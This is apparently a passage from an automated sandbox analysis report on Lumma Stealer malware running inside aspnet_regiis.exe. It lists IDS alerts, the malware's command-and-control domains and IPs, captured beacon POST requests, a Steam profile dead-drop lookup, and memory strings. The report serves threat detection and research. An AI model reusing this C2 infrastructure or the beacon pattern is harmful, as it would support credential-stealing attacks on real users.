Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [eax+esi]	2_2_00592EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx-05h]	2_2_00576F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-0F9FE973h]	2_2_00576F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ecx, eax	2_2_00576F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], C85F7986h	2_2_00580FD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+esi-2Fh]	2_2_00589FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov edx, ecx	2_2_0057AFE3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [eax+esi]	2_2_00592F90

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2056562 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vennurviot .sbs) : 192.168.2.4:60410 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056566 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (enlargkiw .sbs) : 192.168.2.4:61779 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056568 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (allocatinow .sbs) : 192.168.2.4:51466 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056560 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ehticsprocw .sbs) : 192.168.2.4:51139 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056564 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (resinedyw .sbs) : 192.168.2.4:63820 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056570 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mathcucom .sbs) : 192.168.2.4:58982 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056561 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (ehticsprocw .sbs in TLS SNI) : 192.168.2.4:49735 -> 104.21.30.221:443
Source: Network traffic	Suricata IDS: 2056565 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (resinedyw .sbs in TLS SNI) : 192.168.2.4:49733 -> 172.67.205.156:443
Source: Network traffic	Suricata IDS: 2056563 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (vennurviot .sbs in TLS SNI) : 192.168.2.4:49734 -> 104.21.46.170:443
Source: Network traffic	Suricata IDS: 2056559 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (condifendteu .sbs in TLS SNI) : 192.168.2.4:49736 -> 172.67.141.136:443
Source: Network traffic	Suricata IDS: 2056556 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawwyobstacw .sbs) : 192.168.2.4:49533 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056558 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (condifendteu .sbs) : 192.168.2.4:55368 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056557 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawwyobstacw .sbs in TLS SNI) : 192.168.2.4:49737 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2056567 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (enlargkiw .sbs in TLS SNI) : 192.168.2.4:49732 -> 172.67.152.13:443
Source: Network traffic	Suricata IDS: 2056571 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (mathcucom .sbs in TLS SNI) : 192.168.2.4:49731 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49735 -> 104.21.30.221:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49735 -> 104.21.30.221:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49736 -> 172.67.141.136:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49736 -> 172.67.141.136:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49733 -> 172.67.205.156:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49733 -> 172.67.205.156:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49731 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.28.222:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.28.222:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49732 -> 172.67.152.13:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 172.67.152.13:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49737 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49737 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49738 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49734 -> 104.21.46.170:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49734 -> 104.21.46.170:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49739 -> 104.21.53.8:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49739 -> 104.21.53.8:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49740 -> 104.21.53.8:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49740 -> 104.21.53.8:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: enlargkiw.sbs
Source: Malware configuration extractor	URLs: allocatinow.sbs
Source: Malware configuration extractor	URLs: ehticsprocw.sbs
Source: Malware configuration extractor	URLs: drawwyobstacw.sbs
Source: Malware configuration extractor	URLs: vennurviot.sbs
Source: Malware configuration extractor	URLs: condifendteu.sbs
Source: Malware configuration extractor	URLs: resinedyw.sbs
Source: Malware configuration extractor	URLs: passimovrt.cfd
Source: Malware configuration extractor	URLs: mathcucom.sbs

Source: Joe Sandbox View	IP Address: 104.21.53.8 104.21.53.8
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: passimovrt.cfd
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mathcucom.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: enlargkiw.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: resinedyw.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: vennurviot.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ehticsprocw.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: condifendteu.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: drawwyobstacw.sbs
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=1XYT51TuC4g_X2vBeD8OSXAP7fq2lr4kj4ls6Z9CPMI-1728874871-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 85Host: sergei-esenin.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com

Source: global traffic	DNS traffic detected: DNS query: passimovrt.cfd
Source: global traffic	DNS traffic detected: DNS query: mathcucom.sbs
Source: global traffic	DNS traffic detected: DNS query: allocatinow.sbs
Source: global traffic	DNS traffic detected: DNS query: enlargkiw.sbs
Source: global traffic	DNS traffic detected: DNS query: resinedyw.sbs
Source: global traffic	DNS traffic detected: DNS query: vennurviot.sbs
Source: global traffic	DNS traffic detected: DNS query: ehticsprocw.sbs
Source: global traffic	DNS traffic detected: DNS query: condifendteu.sbs
Source: global traffic	DNS traffic detected: DNS query: drawwyobstacw.sbs
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: sergei-esenin.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: passimovrt.cfd

Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Amcache.hve.5.dr	String found in binary or memory: http://upx.sf.net
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: aspnet_regiis.exe, 00000002.00000003.1696321945.0000000002975000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://allocatinow.sbs/
Source: aspnet_regiis.exe, 00000002.00000003.1696271584.0000000002955000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1696321945.0000000002975000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://allocatinow.sbs/api
Source: aspnet_regiis.exe, 00000002.00000003.1696132514.0000000002953000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1696271584.0000000002955000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1696321945.0000000002975000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://allocatinow.sbs/apir
Source: aspnet_regiis.exe, 00000002.00000003.1696132514.0000000002953000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1696271584.0000000002955000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1696321945.0000000002975000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://allocatinow.sbs/pi
Source: aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.akamai.steamstatic
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.a#h
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a
Source: aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PA
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=engliHh
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=bz0kMfQA
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&l=e
Source: aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamehY
Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: aspnet_regiis.exe, 00000002.00000003.1696132514.0000000002953000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1695896940.000000000293E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1696271584.0000000002955000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1696321945.0000000002975000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1695896940.0000000002953000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mathcucom.sbs/
Source: aspnet_regiis.exe, 00000002.00000003.1695896940.0000000002953000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mathcucom.sbs/api
